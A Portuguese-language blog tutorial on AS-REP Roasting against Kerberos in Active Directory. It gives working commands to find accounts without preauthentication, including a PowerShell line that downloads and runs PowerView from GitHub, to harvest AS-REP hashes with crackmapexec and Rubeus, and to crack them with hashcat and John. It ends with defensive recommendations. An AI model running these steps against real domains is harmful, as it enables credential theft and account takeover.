Atacando o Kerberos – AS-REP Roasting

Atacando o Kerberos – AS-REP Roasting

O AS-REP Roasting é um ataque que explora uma vulnerabilidade no protocolo de autenticação Kerberos, usado em ambientes Windows. Ele tem como alvo contas de usuário que possuem a opção “Do not require Kerberos preauthentication” habilitada, o que permite que um atacante extraia hashes criptografados dos pacotes de autenticação AS-REP, que são enviados pelo controlador de domínio.

A opção “Do not require Kerberos preauthentication” pode estar habilitada em uma conta por diversas razões, dentre elas está a compatibilidade com algum sistema, por exemplo.

1. Identificando contas vulneráveis

Você pode saber que uma conta de usuário está vulnerável quando a opção “Do not require Kerberos preauthentication” está marcada. Abaixo veremos maneiras práticas de como realizar a identificação.

Do not require Kerberos preauthentication

1.1 Bloodhound

Através do Bloodhound é possível identificar as contas vulneráveis a ASREP-Roasting de duas maneiras:

  • Clicando em “Find AS-REP Roastable Users (DontReqPreAuth)” na aba Analysis
  • Executando a Query abaixo
MATCH (u:User {dontreqpreauth: true}) RETURN u
asrep roasting bloodhound

1.2 Powerview

Projeto Powerview (PowersSploit).

IEX (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -UseBasicParsing)
Get-NetUser -PreauthNotRequired -verbose | select samaccountname
powerview asrep roasting

1.3 Logado em um Domain Controller

Get-ADUser -Filter * -Properties DoesNotRequirePreAuth | Where-Object {$_.DoesNotRequirePreAuth -eq $True} | Select-Object SamAccountName,Enabled

powershell asrep roasting OU também:

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table SamAccountName, Enabled
asrep domain controller command

2. Realizando o ataque

2.1 Coletando hashes

Com crackmapexec

crackmapexec ldap 192.168.0.200 -u "iron.user" -p "Passw0rd!" --asreproast hashes.txt
crackmapexec asrep roasting

Com Rubeus

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

2.2 Quebrando as hashes

Com Hashcat

hashcat -m 18200 hashes.txt /usr/share/wordlists/wordlist.txt
ASREP Roasting hashcat

Com John The Ripper

john hashes.txt --wordlist=/usr/share/wordlists/wordlist.txt --format=krb5asrep
ASREP roasting john

Como proteger-se contra AS-REP Roasting/ Recomendações

  • Habilitar a Pré Autenticaão do Kerberos em todas as contas (necessário verificar o impacto).
  • Garantir que haja Múltiplo Fator de Autenticação (MFA) onde possível.
  • Ter uma boa política de senha: Implemente políticas rigorosas de senha, exigindo senhas longas e complexas, além de períodos de expiração regulares.
  • Segregação de privilégios: Use o princípio de menor privilégio para garantir que as contas tenham apenas os privilégios necessários para realizar suas funções.
  • Monitoramento de atividades: Implemente soluções de monitoramento e detecção de anomalias para identificar atividades suspeitas em seu ambiente.

Por fim, agradecemos a leitura e esperamos que este post tenha te ajudado de alguma maneira! Caso tenha alguma dúvida, entre em contato conosco pelo Telegram , Facebook ou Instagram ! Veja mais posts no IronLinux !

Posts relacionados

Introdução ao Bloodhound

Introdução ao Bloodhound

O BloodHound é uma ferramenta para análise de relações do Active Directory (AD) que utiliza teoria dos grafos.

Ler post completo
Como editar o arquivo hosts no Windows

Como editar o arquivo hosts no Windows

O que é o arquivo hosts ? Hosts é um arquivo presente em sistemas operacionais que possibilita realizar configurações customizadas para realizar acessos à URLs.

Ler post completo
Hack the Box – Legacy Writeup

Hack the Box – Legacy Writeup

Usaremos Metasploit neste post Hoje veremos o writeup completo da máquina Legacy do Hack The Box!

Ler post completo